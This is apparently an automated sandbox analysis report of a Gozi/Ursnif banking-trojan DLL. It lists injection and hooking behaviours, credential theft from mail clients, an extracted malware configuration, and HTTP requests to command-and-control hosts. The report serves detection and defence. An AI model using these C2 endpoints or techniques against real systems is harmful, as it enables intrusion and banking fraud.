Analysis Report out.dll

Overview

General Information

Sample Name: out.dll
Analysis ID: 343316
MD5: 2ff0ff62b5cf7e7097f75a37492f02f8
SHA1: 9d60d24299762f4aa7fa71838b58e4e747b95df6
SHA256: 09029ff1f317ccfdd92bfd8ae154328748e761231aabb51872e2b1204315f285
Tags: dll

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: loaddll32.exe.7156.0.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "220", "system": "c5b25fbc4c2f6e09b15c0beea689b7f6hhN", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611371427", "user": "3d11f4f58695dc15e71ab15cd837ada4", "hash": "0x3cfb7f6d", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8%
Source: api3.lepini.at Virustotal: Detection: 10%
Source: api10.laptok.at Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: out.dll Virustotal: Detection: 36%
Source: out.dll ReversingLabs: Detection: 45%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.1040000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files
Source: out.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00F87DD8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0138E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0139888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_013A4FE1
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 32_2_04DEB9E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_013905EF

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/qvYtom7jPMjc/BwFvjaIO4Bv/MbiT4yG6pHfZnV/ZL7sBbHjAqjjVKuOVsR_2/BwLLpnqz5A7VsJpR/VO84dIDbsiOR8iF/cYWxYBw9oC1caEXJgQ/1ZZhS32tE/_2FIQD8vf0Ka7hthdepE/X6LzVrz2dY0Kt9O92Fg/RdwscE4szAaD7AwXR4Vb_2/BkqnQ_2BhW_2F/lBJqoDb5/VV0dcjLelYqerhB5eYzjTAM/cUE3isCvij/iDKviq_2BgRZp2DXp/gw7kl8fvts1f/V1i5c7M51yH/1feNv9xtSWcKia/RzrYlQJt9o9X3mmLIReIH/gGWW8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zmvfM_2BxkF2z6LAdGBQYT/VVFUBTjiLtdmv/z1vsS1b9/h_2Fj_2BxFVp8DBu2Dofcsv/Kv6seO5eeW/D_2BeLNZQPv2reEOP/gDxjD6y_2Ba9/4irkQZqxmvf/9gg2SCAj4TalZx/1SLIP2InPcQLc5ZsM9f5y/_2FMOWQ6jsIMXMBN/hDufArlyeEDIAOr/Sco7UD5GaVWTjyRv0y/uryOt5Vso/0DF8H9bz3K9Q8xTOA2GN/nbXSkM052l7YJ25GJNP/F1evg5adcZfk_2FVPUzqLE/34tuFQrR HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k3_2BbdPjjCSjH/Bhzm2iLbw_2BlZFjfzdu9K/QNeuz5NJoJPdd/3RpNk4gX/684IFalzbokAf38NKCQoGB3/giv4u8aUar/1Y3IwJEGTTwG7vgZb/hfQjMo3huzsc/_2B2kxzS9SV/aDAgJWuWGRyIv3/OVgklOZtJCDxn5mV_2BOp/ZWvDrGcJhzM9JQCv/ytbaFIu03cT7HsQ/LvD4iOQPI8imqvRWlT/lJ9Iessga/osAc16h46CUOpOSEj/Yy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/xnHAsL1d/fsXvh_2FqVkJzjJvIXVP386/sdHFYJjUzJ/mq43UZwYK4FgDCOnc/d6cqEgrS6hS0/yp4nDUlwnDa/ddfbdz56Dh1hTq/LrfxBoj9_2FbR1C4Ne_2F/szE2P1qBc4BfGVsX/nGM5l8QMlmw5kmi/QVG_2BIrV4GqfgGs53/ZvRn1P0u9/8VUaGimT1Vpnn1Eb2u3U/bOn04R5ChWboXWbTtj8/m4lBRSaAxwnyjeEKdpyj8r/iXLsJGMs8uSTY/pDl9P04P/3WN74fdSL4m2h4Em0_2BNdG/z7s8dMlVkI/qqzG94ApmaqBEZGQ7/8vA HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/PwElXtu1a1ZKEBW8VI4ILA6/C13ZlCGLPf/xbMloqVHEi2N8EvPw/onOYysTw787u/lNsSQdb7adO/WTcHzLbVAjUFsU/yNI28gR4HNSgUrzaABrB_/2Ff5rClIFDKCPamX/LhKcGHTdcpy3Q1x/C_2FUBl8MXyD7rFF5y/_2BqpwBxk/tzgRETfStG7sL50DxVPi/KudBEmh7ELXBUurmd1W/HnwD8_2F7x9j58GCY_2BCE/FHx8MfU3Gbyrl/GAR0LJZU/2CBuYYB3OJmIjTAisk7a2gA/8gGq_2B5fD/hW5rhKLd6LFogxF1_/2BMayi7nxB4/VTo4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: app.crasa.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 18:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/y
Source: explorer.exe, 00000020.00000000.563196482.0000000008455000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k
Source: explorer.exe, 00000020.00000000.558064670.00000000062E0000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zm
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000017.00000002.585596596.000001F7DDD11000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
